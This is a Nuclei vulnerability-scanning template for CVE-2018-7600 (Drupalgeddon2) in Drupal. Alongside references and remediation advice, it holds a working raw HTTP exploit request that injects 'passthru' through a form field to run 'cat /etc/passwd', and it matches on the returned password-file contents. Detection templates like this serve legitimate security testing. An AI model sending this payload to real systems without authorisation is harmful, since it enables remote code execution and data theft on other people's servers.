nuclei-templates/http/cves/2018/CVE-2018-7600.yaml

76 lines
2.7 KiB
YAML

id: CVE-2018-7600
info:
name: Drupal - Remote Code Execution
author: pikpikcu
severity: critical
description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
remediation: |
Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team.
reference:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
- https://www.drupal.org/sa-core-2018-002
- https://groups.drupal.org/security/faq-2018-002
- http://www.securitytracker.com/id/1040598
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7600
cwe-id: CWE-20
epss-score: 0.9756
epss-percentile: 0.99997
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: drupal
product: drupal
shodan-query: http.component:"drupal"
tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive
http:
- raw:
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Referer: {{Hostname}}/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"
matchers-condition: and
matchers:
- type: word
part: header
words:
- application/json
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402203fd7353b9ab2322c84ac9285be516c5b205dd892dd3d9c7293856339aefc5e8702201c262f4f01d10e431ede539ac160400396d1859f9299cef97b0de4ba978921e3:922c64590222798bb761d5b6d8e72950